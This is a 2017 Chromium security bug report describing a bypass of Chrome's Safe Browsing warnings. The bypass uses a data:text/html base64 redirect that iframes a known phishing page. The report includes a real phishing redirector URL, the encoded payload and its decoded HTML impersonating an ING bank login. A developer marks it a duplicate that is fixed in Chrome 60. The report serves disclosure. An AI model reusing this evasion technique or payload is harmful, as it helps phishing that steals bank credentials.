New issue
Advanced search Search tips

Issue 726053 link

Starred by 1 user
Status: Duplicate
Merged: issue 594215
Owner: ----
Closed: May 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Bypass of Google Safe Browsing in Chrome

Reported by huub.r...@gmail.com, May 24 2017 
VULNERABILITY DETAILS

Website builders, for example phishermen or malware coders, can easy BYPASS the Google Safe Browsing / Deceptive website warnings in Google Chrome using redirects to URL's based on data:text/html;base64 encoding with an iframe. While other browsers report an error Google Chrome is showing the final URL embedded in the base64 encoding, even when this final URL is in the Safe Browsing database. Criminals are using this bug in the wild. 

VERSION
Chrome Version: [58.0.3029.110] + [stable]
Operating System: [Windows 10 (64-bit) fully patched]

REPRODUCTION CASE

I was visiting a data:text/html;base64 based URL today. But you can test this with every reported phishing or malware site encoded within a data:text/html;base64 based URL.

The redirector found in a phishingmail  hXXp://95.110.172.211/aW5mb0BzZXJqYW4tdmxvZXJlbi5ubA0=/indes.php?sdsdgsdgsdg

was redirecting to the URL 'data:text/html;https://www.ing.nl/particulier/index.html;base64,77u/DQoNCg0KDQoNCg0KDQoNCjxoZWFkPg0KCQ0KCTx0aXRsZT5JbmxvZ2dlbiBNaWpuIElORzwvdGl0bGU+DQo8Ym9keSBzdHlsZT0ibWFyZ2luOjBweDtwYWRkaW5nOjBweDtvdmVyZmxvdzpoaWRkZW4iPg0KICAgIDxpZnJhbWUgc3JjPSJodHRwOi8vbTJtLWVsZWt0cm9uaWsuY29tL2ltZy9hcHBzL3MvbmV3L2luZGV4MS5odG0iIGZyYW1lYm9yZGVyPSIwIiBzdHlsZT0ib3ZlcmZsb3c6aGlkZGVuO2hlaWdodDoxMDAlO3dpZHRoOjEwMCUiIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiPjwvaWZyYW1lPg0KPC9ib2R5Pg0KDQo8L2h0bWw+'

Which means you will be guided to:

Source:

<head>
	
	<title>Inloggen Mijn ING</title>
<body style="margin:0px;padding:0px;overflow:hidden">
    <iframe src="hXXp://m2m-elektronik.com/img/apps/s/new/index1.htm" frameborder="0" style="overflow:hidden;height:100%;width:100%" height="100%" width="100%"></iframe>
</body>

</html>

While hXXp://m2m-elektronik.com/img/apps/s/new/index1.htm was already in the Safe Browsing database. 

Chrome must show the 'Decptive website warning' here, but the phishing site was clearly visible. Same problem appears in the Mobile browser version.

See attached files for examples.
NO Warning iframe base64.PNG
115 KB View Download
Warning website.PNG
38.0 KB View Download

Comment 1 by kenrb@chromium.org, May 24 2017

Mergedinto: 594215
Status: Duplicate (was: Unconfirmed)
Thanks for the report. This should be blocked as of Chrome 60, which is currently in Dev and Canary channels. It's is a common source of problems, so top-level redirects or renderer-initiated navigations to data: URLs have been disabled.
Project Member

Comment 2 by sheriffbot@chromium.org, Aug 31 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment